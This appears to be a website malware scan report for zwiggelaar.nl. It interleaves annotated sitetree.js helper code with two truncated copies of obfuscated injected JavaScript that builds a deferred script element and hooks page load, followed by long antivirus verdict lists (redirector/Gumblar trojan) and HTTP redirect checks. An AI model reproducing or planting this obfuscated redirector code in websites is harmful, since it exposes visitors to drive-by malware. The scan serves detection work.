// file declares its own URL helper further down, which would shadow the
// browser's built-in URL constructor - confirm.
// NOTE(review): the function names suggest a session identifier is carried in
// links; if so it is exposed through Referer headers, server logs and browser
// history - confirm against the URL implementation.

// String constant; judging by its name it labels the session key. Its users
// are not visible in this excerpt.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";

/**
 * Forwards to URL.getSessionPair.
 * @param {*} loc - passed through unchanged.
 * @returns {*} whatever URL.getSessionPair returns.
 */
function getSessionPair(loc) {
  var pair = URL.getSessionPair(loc);
  return pair;
}

/**
 * Forwards to URL.getSessionHref.
 * @returns {*} whatever URL.getSessionHref returns.
 */
function getSessionHref() {
  var href = URL.getSessionHref();
  return href;
}

/**
 * Forwards to URL.processLinkz; the result of that call is discarded.
 * @param {*} doc - passed through unchanged.
 */
function processLinkz(doc) {
  URL.processLinkz(doc);
}

/**
 * Forwards to URL.getSessionString.
 * @returns {*} whatever URL.getSessionString returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}

/**
 * Forwards to URL.jdecode.
 * @param {*} s - passed through unchanged.
 * @returns {*} whatever URL.jdecode returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}

function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
McAfee-GW-Edition
JS/Redirector.ad
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
Trojan.JS.Redirector.kv
MicroWorld-eScan
Trojan.Iframe.AZF
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
McAfee
JS/Redirector.ad
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF

http://zwiggelaar.nl/./././././include/sitetree.js
200 OK
Content-Length: 8851
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



/**
 * Decodes a form-style escaped string: every "+" becomes "%20", then the
 * escapes are resolved with the legacy global unescape().
 * @param {string} s - escaped text.
 * @returns {string} the decoded text.
 */
function jdecode(s) {
  var withSpaces = s.replace(/\+/g, "%20");
  return unescape(withSpaces);
}

// Positions 0..7; each row of theSitetree below has eight entries, so these
// look like the column indexes of a row.
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two rows are visible in this excerpt. The sixth entry is the string
// 'true', not a boolean, so a consumer has to compare it as text.
// No trailing comma after the last row: it would change the array length in
// old browsers.
var theSitetree = [
  [
    'PAGE', '1508',
    jdecode('Portal'), jdecode(''),
    '/1508.html', 'true', [], ''
  ],
  [
    'PAGE', '33801',
    jdecode('Webmail'), jdecode(''),
    '/33801.html', 'true', [], ''
  ]
];
... 3312 bytes are skipped ...
;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();

Antivirus reports:

Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Trojan.Iframe.AZF
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Iframe.AZF
K7AntiVirus
Trojan ( 637f3b880 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Comodo
TrojWare.JS.Redirector.UA
Emsisoft
Trojan.Iframe.AZF (B)
K7GW
Exploit ( 04c559b91 )
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Trojan.Iframe.AZF
TotalDefense
JS/Redirector.BH
NANO-Antivirus
Trojan.Script.Agent.yrkab
F-Secure
Trojan.Iframe.AZF
F-Prot
JS/Redir.AZ
AVG
JS/Redir
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Iframe.AZF
Commtouch
JS/Redir.AZ
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Trojan.Iframe.AZF


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: zwiggelaar.nl

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:57:37 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: nl
Content-Length: 7874
Content-Type: text/html
Last-Modified: Tue, 06 Apr 2010 14:44:46 GMT

...7874 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zwiggelaar.nl
Referer: http://www.google.com/search?q=zwiggelaar.nl

Result:
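The result is similar to the first query. There are no suspicious redirects found. This check compares the HTTP responses of the two requests only; it does not cover the script found in the pages listed above, which runs in the visitor's browser after the page has loaded.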